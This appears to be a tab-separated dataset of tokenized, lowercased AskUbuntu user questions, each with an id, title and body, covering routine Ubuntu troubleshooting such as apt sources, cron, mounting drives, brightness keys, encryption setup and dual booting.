323060	adding switzerland cran mirror for r in /etc/apt/sources.list	i 've got an error while trying to add the r cran mirror for switzerland to the sources.list file ( http : //stat.ethz.ch/cran/ ) , even though i followed the instructions from page http : //stat.ethz.ch/cran/ ( i 'm running ubuntu 13.04 ) i really ca n't find what i 'm doing wrong ... here are my steps : sudo gedit /etc/apt/sources.list then , in the source.list file , i added a line like that , at the very end : # r repositories switzerland http : //stat.ethz.ch/cran/bin/linux/ubuntu raring/ then , save and exit and the error appears when typing the sudo apt-get update command : sudo apt-get update e : type 'http : //stat.ethz.ch/cran/bin/linux/ubuntu ' is not known on line 60 in source list /etc/apt/sources.list e : the list of sources could not be read . why ? thank you for your answers !
323061	suspend closes open applications	i am using the chromebook pixel . ubuntu 12.04 lts was installed using chrubuntu . when i suspend i loose everything i was working on . all of my open applications are closed . when i shutdown i do see the message that all processes are being closed however when i suspend i do not see this thus i am expecting everything to still be open . is this normal for ubuntu ? or is this a sympton of using a chromebook pixel with ubuntu installed using the chrbuntu script ? thanks .
323062	does the adobe suite run on ubuntu ?	hey i am a video guy and thought about switching to your os . does it support the adobe suite ? thanks ! jonathan
323066	how to resize /run ( to make /run/shm bigger ) properly - and where is it 's ' size set ?	on ubuntu 13.04 /dev/shm is symlink to /run/shm and /run/shm is just subdirectory of /run . /run is some tmpfs which is mounted but ………… i ca n't find by what and how ( surely it is not present in /etc/fstab and i ca n't grep anything sensible in /etc/init* ) . while usually this directory need no attention , both while trying to setup oracle , and while trying to setup db2 , i faced errors which in the end turned out to mean „/dev/shm is too small” . net is full of advice how to mount -- rebind run to make it bigger , but this operation nicely breaks apps which use /run and are already running at the moment rebind happens ( and there are a lot of them , especially on desktop , including things like upstart , networkmanager , or udev ) . my questions : where exactly is the code which mounts /run , when does it happen ? what should i change to increase /run size at the moment it is created ? ( on my laptop it takes 10 % of memory - 600mb on 6gb laptop - i 'd like to give it 1gb ) if 2 is impossible , what is the proper moment to rebind /run to resize it - so it happens before anythning starts actually using /run ? does there exist any documentation on the subject ? while there are many posts and notes about /run as such , i could n't find anything about configuring it .
323070	is virtual maas removed ?	i am trying to browse in juju charm to locate vitual-maas charm and i could n't find it ? also no info and help link ?
323078	script not running from crontab but running from terminal ?	the script is running from terminal but not from crontab.the script code and error i am getting is written below : cronjob */5 * * * * cd /root/ ; python mkdir.py script # ! /usr/bin/python import subprocess subprocess.call ( [ 'touch ' , 'yahoo.txt ' ] ) error from crontab mail from root @ vps.server.com mon jul 22 21:10:05 2013 return-path : < root @ vps.server.com > received : from vps.server.com ( localhost [ 127.0.0.1 ] ) by vps.server.com ( 8.14.4/8.14.4/debian-2ubuntu2 ) with esmtp id r6mha3ll002017 for < root @ vps.server.com > ; mon , 22 jul 2013 21:10:03 +0400 received : ( from root @ localhost ) by vps.server.com ( 8.14.4/8.14.4/submit ) id r6mha1sr002016 for root ; mon , 22 jul 2013 21:10:01 +0400 date : mon , 22 jul 2013 21:10:01 +0400 message-id : < 201307221710.r6mha1sr002016 @ vps.server.com > from : root @ vps.server.com ( cron daemon ) to : root @ vps.server.com subject : cron < root @ vps > cd /root/ ; python mkdir.py content-type : text/plain ; charset=ansi_x3.4-1968 x-cron-env : < shell=/bin/sh > x-cron-env : < home=/root > x-cron-env : < path=/usr/bin : /bin > x-cron-env : < logname=root > ' : [ errno 2 ] no such file or directory
323081	security issue with default postfix 's `` internet site '' settings	i want to install postfix to send out email from localhost or/and relay email to external mail gateway ( e.g . sendgrid ) . however , i do not want to receive mail using this machine , and i do n't want to accept connection from other machines . when installing postfix , the default is `` internet site '' , this configuration did works perfectly for my purpose . but my understanding is with this setting , my postfix can also receive mail . so what should i do in order to disable the un-needed features , any best practice for postfix configuration for my purpose .
323082	how to map a folder in my vm to my local machine	i 've got a devbox vm running via vagrant and virtualbox . i 'd like to have it just run as a web server and do all my work on my local machine ( where my dev tools are ) . i 've seen this done before , where the vm has an application folder that points to the host machine 's folder , and whenever changes are made on the local machine ( i.e . via sublime/vim ) they are automatically updated on the vm . the vm is running a heroku image ( which i believe runs on ubuntu ) . the host machine is also ubuntu 13.04
323091	notebook overheating for no reason at all	hp dv6 6121tx , ubuntu 12.04 $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati whistler xt [ amd radeon hd 6700m series ] my cpu temp is ~70oc right now , and gpu at around 48oc . i 've switched off my discrete amd gpu via vgaswitcheroo , so it 's not a gpu overheat problem . the issue is that my cpu temps reach ~70-75oc unnecessarily when all i 'm doing is just some internet browsing . i do n't even know how to begin to debug this . please help .
323096	is there a tool like juju or chef that i can use to automate the set up of my computer ?	there are a lot of tools ( chef , puppet , juju ) out there to automate server deployments and set ups . how can these be used for automating my laptop set up ? i want to be able to do nothing but run a command and sit back while everything is installed and configured . also if there are any tools specific to laptops then please mention them too . please mention gui or text based software . thanks . -- edit -- an explanation to `` i want to be able to do nothing but run a command and sit back while everything is installed and configured . '' what i want is to be able to script out the installation of all software on my pc with a minimum manual effort . this script should also be compatible across installations ( like 13.04 or 12.04 ) . if i want to run both versions of ubuntu , then i should be able to install something ( including adding additional ppas ) in one version ( say 13.04 ) , modify the auto installer and when i switch to the other version ( say 12.04 ) , i just run this auto installer and the software is installed , relevant ppas added and the configuration files get picked up from my previous saved state . ( the config files will depend on whether supported by the software , but it would be a great bonus ) another use case would be an os re install . getting everything up and running with all the software that i regularly use would be a breeze .
323099	always on top sidebar : how to make all applications think the screen is less wide than it is	i really miss the google-desktop linux sidebar . the sidebar was a gtk widget that could be positioned on the right and had the option to add many gadgets to it . the great feature of the sidebar was that all applications would stay out of its way . full screen for other applications was always acutal size of monitor - minus - the area occupied by the sidebar . i got used to having rss feeds to a bunch of places on the sidebar open all through the day while i worked . how can i achieve this effect with ubuntu 12.04 onwards . is there a way to trick all applications except one from thinking that the full screen is everything but the sidebar . i can get chrome or conky to serve as the sidebar `` widget '' updating feeds ..but i do not know how to have all other windows stay out of its way .
323100	decrease the time for which the 'thing ' appears while switching workspaces : gnome shell	i am using gnome shell . i want to decrease the time for which this picture or whatever , telling me , in what workspace i am moving , appears when switching workspaces . image attached . in unity , it is sufficiently shortlived . but in shell it remains for a fraction of second longer which really irritates me . when i am reading some programming stuff on a browser in one workspace and am trying it in an ide in another , i like to to quickly switch workspaces . i rapidly keep on switching them : reading here and trying there . but that stupid apparition comes in the way for too long .
323103	lubuntu - power button does n't turn off computer,	i am using lubuntu 13.04 and would like to have the power button cause the computer to shut down . currently it only brings up the power preferences menu ( logout , reboot , hibernate , etc ... ) . in lubuntu , there is xfce4-power-manager v1.2 and i 've tried to fix it here by setting the general- > when power button is pressed- > shut down option , but this does n't change anything . any help would be much appreciated .
323104	installed ubuntu alongside ubuntu but there is no grub	i installed ubuntu 13.04 64 bits alongside ubuntu 13.04 32 bits . after booting my computer , i expected the grub to choose between them , but there is no grub.. what can i do know ? here you have the status of my hd as you can guess , /dev/sda6 is the partition with my second ubuntu ( 64 bits ) . as you can it is like inside of /dev/sda2..that is also strange for me..what should i remove in case i have to remove something ?
323108	error `` system is running in low graphics mode '' solved only partially	first of all i wanted to say that i am pretty new to linux , but i admire the system a lot ! ok , so after having ubuntu 13.04 for a week , i was experimenting with compiz cube effects and the system crashed . after rebooting i had the following error `` system is running in low graphics mode '' . i tried several solutions posted on the net and finally installing gdm solved the problem . however not entirely . at the moment i do not have this error anymore , but the graphic is not working perfectly . the autohide unity launcher leaves the gray space ( the wallpaper is not stretched to that area ) . the transparancy of the pannels doesnt work anymore and the worst thing i noticed is much higher usage of cpu . basing on the above i am thinking that the graphics driver doesnt work properly . is that correct ? now my hardware : i have lenovo ideapad y580 laptop with i7 processor , intel built-in graphic card and geforce 660m . i know that this works under this optimus technology , thus first day of having ubuntu i installed bumblebee , which was working ok ( there was a significant difference in fps between glxspheres and optirun glxspheres ) . however i did not configurate any application to work with this optirun command , so i am thinking that everything ( unity , cairo dock ( no opengl ) , compiz ) was using this intel video card . could you please give me any advice how to solve these problems ? am i thinking correctly that it must be something with the intel driver ? should i be using geforce for compiz effects or cairo dock ( if so , how ? ) . thanks , marcin
323111	booting into windows from grub rescue	i had dual os , and after booting into windows i deleted the linux partition and forgot to rewrite windows mbr from within windows and that made me land on the grub rescue after the reboot . i do n't have an internal disk drive , so all i can use use is the bootable usb drive with any os loaded onto it . but the thing is usb has lower priority than the hard disk in the bios settings , and the bios settings wo n't show up if i press the f2 key nor the boot device order menu on pressing f12 . is there any possibility of changing the boot device order from grub rescue ? remember i have deleted the linux partition that i can not have the linux kernel load from the boot rescue . what do i do now ?
323112	how to blackout screen or start screensaver with shortcut keys ?	i 'm often reading a hardcopy paper/book and taking notes on the laptop . i like to save energy ( and battery ) when the laptop is just waiting for me to read . my laptop unfortunately does n't have a function key that blacks out the screen ( which my previous laptop had , such a great idea ) -- not to mention that my function keys do n't work with ubuntu anyways . as simple as this is , i have n't found the optimal solution : how do i blackout the screen ( or start a screensaver , that 's fine , too ) with a shortcut key combination ? i would really like to avoid loading an application to ram ( at startup ) . this should be a simple function that can be performed on demand . but , if you are strongly convinced that there is no way , then please be kind enough to state that so i can go figure out how to do this with xscreensaver or whatever . note that i 'm not trying to lock the screen . indeed , i 'm trying to avoid locking the screen so that i do n't have to keep on typing my password everytime i want to start the screen to take a note . i 'm on ubuntu 13.04 64-bit with a toshiba satellite l830-135 .
323115	how do i use dm-crypt ( luks ) with gnupg to use two-factor for fde ?	when using full disk encryption with ubuntu ( opposed to homedir encryption ) , dm-crypt with luks is used for encrypting the volume . in the installer ( at least on 12.04 alternate ) you can choose between setting it up using a passphrase or a keyfile . i 'd like to use a combination of the two ; not either , but require both . why ? because this enhances security ( two-factor ) ; you 'll need to have something and you need to know something to unlock it . then i want to put the keyfile on a small removable storage device ( usb flash drive ) and only plug it in during boot time . the result should be that it is required to put in the right flash drive and provide the right passphrase to unlock the root partition . so , put in other words , i want to be asked during boot for the passphrase to which the keyfile on an external drive is encrypted . i see a /usr/share/initramfs-tools/hooks/cryptgnupg helper script that may help to accomplish it , but i have no clue how to use it . just to avoid confusion : i am not asking for a way to add an additional key to the volume to unlock it .
323117	installation problems with windows 8	ok so i am running windows 8 on my computer currently and trying to get ubuntu up and running in a dual boot . my system has uefi secure boot ( for the record its a laptop ) . when i boot up my ubuntu from a flash drive it does not recognize windows 8 is installed on my system . also if it is any help , windows 8 and the drive i am try to install ubuntu on is a solid state drive . and before anyone asks i have trying disabling secure boot . any help would be greatly appreciated !
323122	how do i install packages from landscape ?	ubuntu 12.04.2 lts ( precise ) i 've found some resources on how to do install packages from landscape , but i think that 's for the desktop version . the server version does n't seem to have the installer . these are the only sections i see : summary 1 computer is fully up-to-date security issues there are no known security upgrades available for selected computers . an ubuntu security notice is issued when a security vulnerability affects a supported release of ubuntu . package information computer available installed upgrades held r01n01 44584 382 - - advanced options you can request that all possible upgrades be applied to the selected computers . the resulting activities , if any , will require an explicit administrator approval to be delivered .
323124	how to know what and when the next cron job is ?	is there a tool or a way to view the next scheduled job ( in the system or at least at the user level ) and its time , without looking into crontab ( crontab -l ) ? edit : imagine that there are 500 different cron jobs with repetitions . i need an `` easy '' way to know that the job a will be executed after 5 minutes from now .
323127	uniq -- count command is yields incorrect result ?	from the document said that the option -- count going to prefix lines by the number of occurrences but after i do some test it seems does n't work . $ echo -e `` a\na\b\nc '' |uniq -- count 1 a 1 a 1 c should the line 'a ' occurs 2 times ?
323128	what are the most common reasons why someone might prefer windows over ubuntu ?	what are the most common reasons why someone might prefer windows over ubuntu ? i am a heavy windows user who happens to miss some aspects of the windows os whenever i am using ubuntu . i am just curious about this perspective that others have . in my experience it is the small things that sway me one way or another . i am looking for answers that are not generalizations or opinion , but instead `` specific '' reasons . i am not including mac osx in this question since it is a unix relative .
323131	setting timezone from terminal	there has been a few questions about this topic and i know the answer this could help others and maybe someone could help me out if what i want to do is possible i want to chainge the timezone of the system clock from the terminal this caan be done with tzselect `` which opens a gui in terminal '' or sudo cp /usr/share/zoneinfo/europe/london /etc/localtime `` which will set to gmt '' but is there a way to set time zone with just the offset ie.-1 or +5 etc ? i need to do this as im writing an aplication to adjust timeoffset or report logs and the only info i have is the user ip which i can use a webapp to locates location of ip but then i need to set offset which would be easy if i could just get offset of location but if i need to find zone and city it would be a rreal pain if anyone knows the answer to how to set system clock with +/-hour would be great its hard to find info with ubuntu forums being down
323134	hdd image recover	have you ever used the command `` create disc image '' that is found natively in ubuntu in the `` disk '' application , and then clicking on the icon with the gear in the top right ? i need to create an image of my hd and i wanted some info about it . i also noticed that you can create and restore the image for each partition , as well as the entire disk . the thing i find interesting , because the application is native and you do not need third-party programs . thanks for the help
323150	no sound through tv when connected through hdmi to lenovo desktop running ubuntu 12.04	i know this is a common problem and i 've been reading related questions , but none have helped me so far . please help if you are able . it 's been a week and still no progress on my own attempts to repair i 'm a new ubuntu user and recently installed 12.04 on my pc tower that is only used for the tv ( mainly netflix ) . it 's a basic lenovo desktop ( can give details if necessary ) and i 'm connecting it with an hdmi cord to a sony bravia tv that has been used for windows os ( 7 & 8 ) without problem . i have picture , just no sound . when i go to system settings > sound , hdmi/display port is an option . the only other option is analog output . sound works when headphones are connected to the tower . note : i do n't have computer monitors in my household , just the 32 '' bravia and a 24 '' ( ? ) tv which runs off a windows laptop . i also do n't have computer speakers . update : hdmi/display port is not longer an option , probably goofed something up . `` dummy control '' is in its place now . analog control went away when hdmi/display port disappeared ; again probably something i unknowingly screwed up . this is my result from aplay-l : http : //pastebin.com/w0dltsvj is it possible that this problem is related to my graphics card ? it 's what came on the lenovo ; hynix semiconductor ( hyundai electronics ) radeon hd 3000. as in the comments below , i installed pavucontrol , but no luck ; dummy control is still my only option .
323153	sending large files to clients	i own a new recording studio and we have been using cloud storage like dropbox to send large files to our clients . however , i feel there must be a more practical solution that having to wait hours for the files to upload to dropbox in order for a client to download them . i thought there might be some simple ubuntu style os that i could install on a junk pc . then from that pc i 'd be able to plug in a usb containing the files , place them in a folder and then share that folder to my client over the net . obviously security is very important as we would only want only recipient and their invited guests to have access to that folder and no one else . the other thing that i imagine may be an issue is that of the dynamic ip address which our isp provides . would i need to have a static ip address for such a thing should it exist ? i 'd love to know your thoughts ! thanks in advance .
323155	how can i make it so when i ssh myself my system info shows up when i log in ?	i have a vds and when i log in my system info shows up and i 'm wondering how i can do this with my desktop that 's running 12.04 lts because i love the feature . here is a picture that shows the difference :
323156	adjust screen brightness does n't work xubuntu 13.04 xfce4 keyboard shortcut fn+f2/f3 toshiba l840 laptop	ca n't adjust the screen brightness using keyboard shortcut ( fn+f2/f3 ) . running xubuntu 13.04 w/ xfce4-power-manager on a toshiba l840 laptop . tried editing the grub file w/ grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' - > no luck removed power-manager from autostart and included 'xfce4-power-manager -- no-daemon ' to auto start - > no luck only thing works is echo 1 | sudo tee /sys/class/backlight/acpi_video0/brightness - > ( brightness 1 to 7 ) from searching very inconvenient way of doing it . it would be great if someone could tell me how to rectify this problem or direct me to a source of information .
323158	encrypted swap causes boot crash	i have been trying to solve this problem for a while now . i encrypted my home folder and the swap area and now when i select the first option in the boot loader the os freezes . i tried reinstalling and encrypting on install and encrypting after install with the same effect . a weird pattern of squares is shown on the screen and the keyboard is unresponsive ( even numlk does n't make the led light up ) . i can boot by going in recovery mode and selecting continue booting normally but the graphics driver does n't load and i have a very annoying resolutions . any suggestions ? p.s . i am running ubuntu 13.04
323162	variable assigning in terminal	is there a way to assign a value to a variable , that value which we get in terminal by writing any command ? example : command : sensors we get cpu temperature . how can i assign this value to a temp_cpu variable . thanks..
323165	libreoffice-templates package - how do i access them ?	i have installed the package libreoffice-templates via synaptic , but when i go into libreoffice writer and open template manager , there are no templates there ( for writer ) - is there something i need to do to import the templates in the package into the template manager ?
323170	how to make open programs in unity launcher appear at the top of the list	i have lots of program launchers in unity , using the whole height of the screen on the left side ( as by default ) . if i open a program , which is not in the launcher , its icon will be located at the bottom side of the launcher list , next to the rubbish bin . so , some programs with open windows ( that i 'm actually using ) will be a bit hidden downside . but i would like to have the running applications on the top , for better reach . that is because sometimes i work on ten documents at the same time , for which it is not very comfortable to use the switcher ( what i do , so this not the solution ) . is there a way to customize the location where starting programs appear in the launcher ? i do n't mean to just drag and drop that icons to a new location , as i want them to appear only during the time that i am using that program ( if i drag them to a new location , they will stay there afterwards ) . still no answer to this question , but as i think it would be a very important feature for the unity launcher , to have all the open programs on the top of the launcher ( next to the dash ) , i will add some information . there is a new unity-teak-tool in the repositories . i installed and studied it , but could n't find a way to specify , where open programs should appear in the launcher list .
323172	how do i stop update manager from bugging me to install updates i do n't want	whenever i use update manager to install updates i have to painstakingly scroll through a long list of updates and un-check all the updates i do n't want , every time . it would be nice if there was a way to simply 'dismiss ' unwanted updates so that they would not continue appearing in the list .
323174	how to restore `` normal '' users after reinstalling ubuntu 12.04	i 've reinstalled the ubuntu 12.04 but i save home directory . after reinstallation my ( admin ) account is ok. for others users i created new accounts with same username and passwords . but users can not log in ( there are appropriate users ' folders ) . they can log in ctrl+alt+f1 but they cannont log in in graphical interface . what i need to do ?
323177	how to make fn keys change brightness on gateway m7315u ?	i know this not a new issue concerning brightness , however , i am anxious to get this working . i added acpi_backlight=vendor to the boot parameters which allows me to change the brightness using brightness and lock but the fn + up and fn + down just turns the screen off forcing me to close the lid and reopen . i feel like the only thing i need to do is change some values somewhere to allow these keys to change in increments , but i am not sure how . i have read of some scripts some people have wrote for other laptops , but i have not tried with mine for fear it may not work .
323181	what do i do if i forgot to pay the $ 30 shipping on the ubuntu edge ?	i just paid the $ 600 that was automatically in the `` donate '' field . how do i bump it up to include shipping ?
323185	what options do i have to track ubuntuedge fundraiser progress ?	i guess we all are very excited about ubuntu edge , and hope for the best that the 32 millions will be reached . i would love to track the progress , but loading and refreshing the fundraiser site is distracting and not really handy . i am interested in different ways of tracking the money/precentage . i thought a screenlet desktop widget might be useful here , but i am unsure how to achieve this . an indicator displaying current % would be ideal , but i guess that requires some more work . maybe a simple script that displays a notification whenever a full million is reached could be easy to prepare ?
323187	does anybody know the name of this system monitor application ?	does anybody know the name of this system monitor application ?
323192	two operating systems on 2 hard drives	i was wondering if anyone has done this before . i was planning on installing a second hard drive in my computer and was wondering if i could install ubuntu seperate on that drive and not the windows 7 drive . i would think that you should be able to unplug the win7 hard drive and just have the separate one plugged in . i dont want to partition the win7 drive because i will probably use up the rest of the space on it in no time at all . i was wondering if anyone has any help on this .
323194	lxde desktop installation	how do i install the lxde desktop environment ? i have it installed in ubuntu , but can not figure out how to install it so that it can be used .
323201	get the resident memory of indivdual threads of a process using bash shell	if i want to find the resident memory a process uses , i might use something like `` ps aux | grep apache2 '' or `` sudo pmap -d 1130 '' . however , i have one process that has 25 threads , and i would like to know how much resident memory ( excluding the shared process memory ) each of those threads are consuming , as well as showing the total number of threads for that process . i would like to do this in the bash shell . how can i do this ?
323202	ubuntu 12.04 eat a lot of internet bandwidth	i do n't know when this problem start to happen , but whenever i use ubuntu on my computer , my whole house network is down . but when i switch back to windows , the whole house network is back again . is there a problem with ubuntu or just that my computer is eating a lot of bandwidth ? please help . thank you
323205	install nvidia-opengl headers	i 've been struggling with this problem for several days . it 's killing me ... my glxinfo : opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) ironlake mobile opengl version string : 2.1 mesa 9.1.3 opengl shading language version string : 1.20 opengl extensions : i have an nvidia gt 520m card , how can i use libgl from nvidia ? i installed nvidia-current and nvidia-current-dev , but nothing happens . my laptop : acer 4743g ; 2g ddr3 memory ; gt 520m graphics card .
323206	ca n't install ubuntu .	i tried installing 13.04 as a dual boot . i get the `` use the live cd to install ! '' thing . not having a live cd , i try to use a live usb . all my efforts so far seem for naught . i did this , http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows then i set my bootup sequence to use the usb first . which to me , means i ought to be able to start up and install ubuntu , right ? the result is the computer skips right past the usb and just loads windows7 . am i missing something here ? i must be .
323209	ubuntu on usb keeps asking to install on hdd	i used the pendrive universal usb installer to create a live usb w/ubuntu i can boot fine and everything works but everytime i boot it asks if i want to install to the hdd . i choose no but it takes a long time to load from there . is it possible to skip the install selection screen ? this is for personal use of my work laptop and while linux via usb is acceptable , install to hdd is not permitted .
323213	ubuntu server several network ip config ?	i have one ubuntu server and i want config that with several ip address ! is it possible or no ? if yes how i can do that ?
323216	sudo apt-get crashed during hbase installation	i had problem regarding hbase installation and end up in a buggy `` sudo apt-get '' now . it is telling me java_home is not set while it is . jalal @ mona : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : hadoop-hbase the following new packages will be installed : hadoop-hbase 0 upgraded , 1 newly installed , 0 to remove and 18 not upgraded . 4 not fully installed or removed . need to get 0 b/30.6 mb of archives . after this operation , 34.7 mb of additional disk space will be used . do you want to continue [ y/n ] ? y selecting previously unselected package hadoop-hbase . ( reading database ... 264105 files and directories currently installed . ) unpacking hadoop-hbase ( from ... /hadoop-hbase_0.90.6+84.89-1~maverick- cdh3_all.deb ) ... processing triggers for man-db ... setting up hadoop-hbase ( 0.90.6+84.89-1~maverick-cdh3 ) ... setting up hadoop-hbase-master ( 0.90.6+84.89-1~maverick-cdh3 ) ... +======================================================================+ | error : java_home is not set and java could not be found | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | please download the latest sun jdk from the sun java web site | | > http : //java.sun.com/javase/downloads/ < | | | | hbase requires java 1.6 or later . | | note : this script will find sun java whether you install using the | | binary or the rpm based installer . | +======================================================================+ invoke-rc.d : initscript hadoop-hbase-master , action `` start '' failed . dpkg : error processing hadoop-hbase-master ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up hadoop-hbase-regionserver ( 0.90.6+84.89-1~maverick-cdh3 ) ... +======================================================================+ | error : java_home is not set and java could not be found | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | please download the latest sun jdk from the sun java web site | | > http : //java.sun.com/javase/downloads/ < | | | | hbase requires java 1.6 or later . | | note : this script will find sun java whether you install using the | | binary or the rpm based installer . | +======================================================================+ invoke-rc.d : initscript hadoop-hbase-regionserver , action `` start '' failed . dpkg : error processing hadoop-hbase-regionserver ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up hadoop-hbase-rest ( 0.90.6+84.89-1~maverick-cdh3 ) ... +======================================================================+ | error : java_home is not set and java could not be found | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | please download the latest sun jdk from the sun java web site | | > http : //java.sun.com/javase/downloads/ < | | | | hbase requires java 1.6 or later . | | note : this script will find sun java whether you install using the | | binary or the rpm based installer . | +======================================================================+ invoke-rc.d : initscript hadoop-hbase-rest , action `` start '' failed . dpkg : error processing hadoop-hbase-rest ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up hadoop-hbase-thrift ( 0.90.6+84.89-1~maverick-cdh3 ) ... +======================================================================+ | error : java_home is not set and java could not be found | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | please download the latest sun jdk from the sun java web site | | > http : //java.sun.com/javase/downloads/ < | | | | hbase requires java 1.6 or later . | | note : this script will find sun java whether you install using the | | binary or the rpm based installer . | +======================================================================+ invoke-rc.d : initscript hadoop-hbase-thrift , action `` start '' failed . dpkg : error processing hadoop-hbase-thrift ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : hadoop-hbase-master hadoop-hbase-regionserver hadoop-hbase-rest hadoop-hbase-thrift e : sub-process /usr/bin/dpkg returned an error code ( 1 ) according to echo $ ( readlink -f /usr/bin/java | sed `` s : bin/java : : '' ) my java_home is /usr/lib/jvm/java-6-openjdk-amd64/jre/ and here 's echoing it : jalal @ mona : ~ $ echo $ java_home /usr/lib/jvm/java-6-openjdk-amd64/jre/ please let me know how i can fix my sudo apt-get install in the very first place and then how is it possible to install hbase using sudo apt-get install ? by adding /usr/lib/jvm/java-6-openjdk-amd64/jre \ using sudo nano /usr/lib/hbase/bin/hbase-config.sh to : for candidate in \ /usr/lib/jvm/java-6-sun \ /usr/lib/jvm/java-1.6.0-sun-1.6.0 . */jre \ /usr/lib/jvm/java-1.6.0-sun-1.6.0 . * \ /usr/lib/j2sdk1.6-sun \ /usr/java/jdk1.6* \ /usr/java/jre1.6* \ /library/java/home ; do if [ -e $ candidate/bin/java ] ; then export java_home= $ candidate break fi done i stopped receiving java_home not found error . however now i have this error after sudo apt-get install -f : pam_mount ( spawn.c:128 ) : error setting uid to 0 any fix to my sudo apt-get install ?
323223	external hard drive can not be mounted	i 'm using ubuntu 10.04 . my external hdd is not automounted as i connect it and i ca n't mount it manually using : sudo mount -t ntfs-3g /dev/sdc1 /media/external no error is given but the output of the mount command shows that it is not mounted and shows that the device is detected as , sudo fdisk -l gives : disk /dev/sdc : 2000.4 gb , 2000365289472 bytes 255 heads , 63 sectors/track , 243197 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0005f107 and blkid gives , /dev/sdc1 : label= '' my passport '' uuid= '' f474b7aa74b76dcc '' type= '' ntfs '' any help is appreciated .
323227	wireless issues on gateway m-6750	i 've just installed ubuntu 13.04 and i can not figure out how to get the wireless working , wired worked fine . i have followed a few instructions on driver downloads but i really do not have a clue what i am doing . i know there is a ton more info you need so just let me know what and how to get it and i will . i am on a gateway m-6750 , i believe it is using the marvel topdog wireless card ( internal ) . i switched to ubuntu 13.04 from windows vista . thank you , john here is additional info iwconfig lo no wireless extensions . eth0 no wireless extensions . ifconfig eth0 link encap : ethernet hwaddr 00 : e0 : b8 : e4 : a7 : e9 inet addr:192.168.6.237 bcast:192.168.6.255 mask:255.255.255.0 inet6 addr : fe80 : :2e0 : b8ff : fee4 : a7e9/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:10154868 errors:0 dropped:0 overruns:0 frame:0 tx packets:6843213 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:14151434429 ( 14.1 gb ) tx bytes:542801103 ( 542.8 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:36886 errors:0 dropped:0 overruns:0 frame:0 tx packets:36886 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:2707955 ( 2.7 mb ) tx bytes:2707955 ( 2.7 mb ) networkmanager tool state : connected ( global ) - device : eth0 [ wired ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : wired driver : r8169 state : connected default : yes hw address : 00 : e0 : b8 : e4 : a7 : e9 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.6.237 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.6.1 dns : 192.168.6.1 dns : 64.134.255.2 dns : 64.134.255.10 lshw -cnetwork hardware lister ( lshw ) - b.02.16 usage : lshw [ -format ] [ -options ... ] lshw -version -version print program version ( b.02.16 ) format can be -html output hardware tree as html -xml output hardware tree as xml -short output hardware paths -businfo output bus information options can be -class class only show a certain class of hardware -c class same as '-class class' -c class same as '-class class' -disable test disable a test ( like pci , isapnp , cpuid , etc. ) -enable test enable a test ( like pci , isapnp , cpuid , etc. ) -quiet do n't display status -sanitize sanitize output ( remove sensitive information like serial numbers , etc . ) -numeric output numeric ids ( for pci , usb , etc . ) sudo lshw -c network *-network unclaimed description : ethernet controller product : 88w8362e [ topdog ] 802.11a/b/g/n wireless vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:02:00.0 version : 03 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f6000000-f600ffff memory : f4000000-f400ffff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth0 version : 01 serial : 00 : e0 : b8 : e4 : a7 : e9 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=192.168.6.237 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:43 ioport:4000 ( size=256 ) memory : fa200000-fa200fff memory : c0000000-c001ffff
323230	mounting drives using keyboard shortcut	recently , i learned that we can assign and access specific folders using keyboard shortcut . for example , to access my downloads folder , i have assigned the command : nautilus downloads/ and a keyboard shortcut alt+d to access the downloads folder . similarly , is it possible to assign keyboard shortcut to access folders located within unmounted drives ? for instance , i have a folder named `` ttc video high school basic math ( compressed ) '' located in /media/87daf597-b5fc-45e9-b961-30895d500bcc but using nautilus media/87daf597-b5fc-45e9-b961-30895d500bcc/ i am unable to mount the partition .
323231	installing ubuntu ( dual boot )	i have already installed windows 8 and windows xp on my c : and d : drives of 50 gb each respectively . now i want to install ubuntu on my e : drive of capacity 50 gb . help me pls with the things i need to know to achieve this . tell me abt the partitioning also in ubuntu as i dont know abt ext4 .
